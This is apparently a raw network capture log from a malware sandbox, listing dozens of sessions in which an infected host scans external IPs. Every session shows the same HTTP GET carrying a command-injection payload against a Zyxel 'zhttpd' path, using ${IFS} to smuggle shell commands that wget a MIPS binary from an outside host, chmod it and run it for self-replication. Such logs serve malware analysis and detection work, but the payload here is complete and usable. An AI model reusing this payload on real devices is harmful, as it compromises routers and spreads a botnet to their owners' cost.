                                      Jan 19, 2024 17:29:35.838686943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5177192.168.2.1453252178.118.75.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838732004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5178192.168.2.144803079.76.41.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838793993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5179192.168.2.1438126199.143.189.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838830948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5180192.168.2.14464648.210.227.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838861942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5181192.168.2.1433678189.48.196.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838916063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5182192.168.2.14578021.3.194.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838944912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5183192.168.2.1432874163.220.89.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838973999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5184192.168.2.144292489.220.96.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839024067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5185192.168.2.143575073.49.224.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839049101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5186192.168.2.1436176197.66.78.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839118958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5187192.168.2.1451548213.5.57.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839149952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5188192.168.2.1439446129.12.38.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839174986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5189192.168.2.145466898.2.161.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839195013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5190192.168.2.1444104111.24.128.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839260101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5191192.168.2.1455746146.149.35.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839277983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5192192.168.2.143893045.193.143.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839330912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5193192.168.2.146061048.221.228.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839354038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5194192.168.2.1433536196.202.154.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839389086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5195192.168.2.144057427.98.211.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839447975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5196192.168.2.1460744190.141.2.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839477062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5197192.168.2.1451502195.225.141.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839508057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5198192.168.2.1434702144.60.18.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839574099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5199192.168.2.1459216102.203.68.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839602947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5200192.168.2.144167259.70.175.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839631081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5201192.168.2.1458278132.87.46.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839693069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5202192.168.2.1433726202.57.102.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839726925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5203192.168.2.143559048.32.72.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839757919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5204192.168.2.1438502166.215.217.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839803934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5205192.168.2.1435830147.212.95.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839828014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5206192.168.2.145244869.121.242.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839869976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5207192.168.2.1445652190.2.64.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839920998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5208192.168.2.144506847.148.33.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.839975119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5209192.168.2.1437074112.92.14.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840008020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5210192.168.2.1436812123.78.106.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840050936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5211192.168.2.1456780198.39.47.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840082884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5212192.168.2.1450534137.34.80.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840131998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5213192.168.2.14525661.71.198.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840163946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5214192.168.2.1442364213.4.241.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840188026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5215192.168.2.146063871.22.137.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840229034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5216192.168.2.145273447.148.160.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840276957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5217192.168.2.1442884146.121.216.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840305090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5218192.168.2.144551450.148.99.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840344906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5219192.168.2.144704699.123.167.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840372086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5220192.168.2.1447492107.49.41.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840424061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5221192.168.2.1456448110.81.33.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840483904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5222192.168.2.144693083.166.159.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840517044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5223192.168.2.1456152213.139.232.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840558052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5224192.168.2.144778284.70.59.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840605974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5225192.168.2.1448218132.54.42.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840687037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5226192.168.2.1439844217.141.220.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840720892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5227192.168.2.1452476154.62.195.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840764999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5228192.168.2.14355049.198.212.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840802908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5229192.168.2.144401425.239.3.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840841055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5230192.168.2.1443798176.20.114.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840878010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5231192.168.2.144930072.36.191.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840919018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5232192.168.2.1433844110.176.101.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.840956926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5233192.168.2.144667851.182.234.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841000080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5234192.168.2.143779880.220.114.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841039896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5235192.168.2.145508859.172.210.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841088057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5236192.168.2.1439762183.223.174.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841125965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5237192.168.2.143999844.162.86.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841166973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5238192.168.2.144979838.24.206.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841204882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5239192.168.2.1451014140.187.34.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841218948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5240192.168.2.144312027.154.136.254443
                                      TimestampBytes transferredDirectionData
